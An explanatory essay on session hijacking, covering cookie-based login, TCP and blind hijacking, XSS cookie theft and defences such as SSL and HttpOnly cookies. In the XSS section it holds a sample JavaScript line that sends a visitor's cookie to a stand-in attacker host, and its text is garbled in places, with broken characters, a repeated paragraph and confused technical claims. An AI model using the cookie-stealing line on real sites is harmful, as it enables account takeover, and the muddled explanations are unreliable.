Generally the most common way of tracking a user login state is done by using a cookie. The process is quite simple, go to a page and enter the login id and password. If the information provided is correct, the next response is in the form of a cookie which uniquely identifies a particular user. In order to check the login credentials, cookie is checked for each page of the site and it verifies your originality by being intact, until you log out.
Introduction:Session hijacking term means the exploitation of presently running session. Sometimes it is often referred as session key, it is used to gain the unauthorized gain to a system or to exploit services in the a computer. When a magic cookie which is used to authenticate the user to the server is stolen and used for the unauthorized purse is referred as session hijacking. Generally it is relevant to the web developers, as HTTP cookies are used to maintain the session on a site can be easily stolen by an attacker or the attacker can utilize by gaining access to the computer where the he can find the saved cookies. Cookie:When the user runs a machine, the machine stores a small text file which is called as a cookie.
Cookies are plain text, they do not contain any executable codes A web page or sever instructs a particular browser to store the information and sent it back whenever there is a request based on certain rules. Majority of sites identifies the users by these cookies. A user login state is done by using a cookie. The process is quite simple, go to a page and enter the login id and password. If the information provided is correct, the next response is in the form of a cookie which uniquely identifies a particular user.
In order to check the login credentials, cookie is checked for each page of the site and it verifies your originality by being intact, until you log out. Session hijacking in TCPIn the session hijacking in TCP, the attacker takes over the TCP session between the two computers. As the most of the authentication is done at the starting of the session, this allows the hacker to gain over the machines. One of the common methods used is source- routed of IP packets. It is generally middle in the middle kind of a attack, where a hacker a point B intercepts the conversation between the A and C by encouraging the packets to pass through the attackers machine.
Even though the source routing is turned off, the attacker can use a method called blind hijacking, where the attacker tries to guess the response between the two machines. If he is successful, then the hacker sends a command but he can never see the response but however a common command is like password, which allows to access from some other place on the network. One of the purposes of such an attack is to cause the denial of service attack at one end point so that it will not respond. This attack can force the machine to crash or it can force the network connection for heavy packet loss. Problem:The main problem with this kind of a system is that it leaves the user identification at a single data point and more over the cookies sent over the internet is in the form of plain text, which makes it to highly vulnerable to packet sniffing, where hacker intercepts the conversation between the network and the computer. One the user login cookie is stolen; it can be used to run the similar session at a distinct place by manually setting the cookie.
Because the server canaa‚¬a„?t differentiate between a original cookie and a duplicated cookie which was modified by the attacker through the packet sniffing, so it shows as if the user is logged on. This type of attack is generally referred as session hijacking. To prevent session hijacking using cookies there are few methods. The first one is, sending the cookies over the SSL; this is a common method technique.
SSL uses the encryption method for the request on the site before responding across the internet and cookie value cannot be solely determined by the sniffing. The banks and stores generally use this method frequently since most of the session is for short duration of time. Another method is to generate the session key randomly or which is based on the information of the user such as login id, IP address, and time when he logged in etc. It makes the session key un- usable, though it is possible. The other way is to revalidate the particular user before performing assigned to a higher security level, such as, many sites as for login information for the second time before modifying the password.
Cookies in JavaScriptCreating, removing and manipulation of cookies can be done in JavaScript by using document. cookie property. This property behaves as a set cookie header when it is assigned to a cookie header. While creating a cookie, string must be used in the same format. You can create, manipulate, and remove cookies in JavaScript by using the document.cookie property.
This property acts as the Set-Cookie header when assigned to and as the Cookie header when read from. When creating a cookie, you must use a string thataa‚¬a„?s in the same format that Set-Cookie expects: document.cookie=”name=prahald; domain=nczonline.net; path=/”; just by modifying the values of document.cookie does not delete the cookie. It just either creates or modifies the particular string.
So that whenever the next request is made to the server, these cookies are sent along the set cookie. To retrieve cookie values in JavaScript, just read from the document.cookie property. The returned string is in the same format as the Cookie header value, so multiple cookies are separated by a semicolon and space. Example: name1=Munn; name2=prahalad This is the reason why, we need to compulsory make a cookie string manually as an original cookie Cookie stealing and XSSTo able to load JavaScript from a distinct domain onto a page opens up at a particular week point or security loop holes. In fact a request from a third party, the JavaScript doesnaa‚¬a„?t include the cookies containing in a page.
The JavaScript can get access to all of them. All the script page are considered as, running on a common platform. With the similar path, and by using the similar protocol as the page. This means a script form loaded in other domain page by reading the cookie as cookie. Document.
For example, it can be dangerous , if a person lodes a script from evil-domain.com which consists of some useful codes. However, users at evil-domain.com can switch that code to the following: (new Image()).src = “http://www.evil-domain.
com/cookiestealer.php?cookie=” + cookie.domain; As this code is being loaded on to the user page, without being recognized by user send users cookie to the evil-domain.com. This problem happens to each and every person who visits the site.
Once the hacker has the user cookie, it is very easy to penetrate and doing other attacks including the session hijacking. Whenever attack happens due to injection of third-party JavaScript into a page, it is referred as cross-site scripting attack or it is generally referred as XSS. Cookie theft doesaa‚¬a„?nt occur by just injecting a malicious scrip onto your page accidentally, it can also happen due to poor input filtering. Such as a page, where the user can enter the text, which is the output, onto the page.
If the text consists of a script tag with the similar code as mentioned above then it is possible to steal the cookies The cross site scripting attack has been used against large sites for example, live journal and MySpace. The best way to protect is of forms: Never ever include the JavaScript for sites or domains which are untrusted. The CDNs of big companies like yahoo,AOL and Google should be more secure; using best precaution which includes other locations. From all the user input the HTML should be filtered out. You should not accept any user input and outbound onto a page without filtering it.
ConclusionHence it is safe to use cookies which all the security issues around them. That is why HTTP cookies are considered as important over the standard cookies implementations. If a cookie is marked as HTTP, a attacker cannot inject or get access to the malicious script by cookie via document. So it becomes difficult to steal the cookies. When such a HTTP cookies are supported by the browsers it becomes a third option.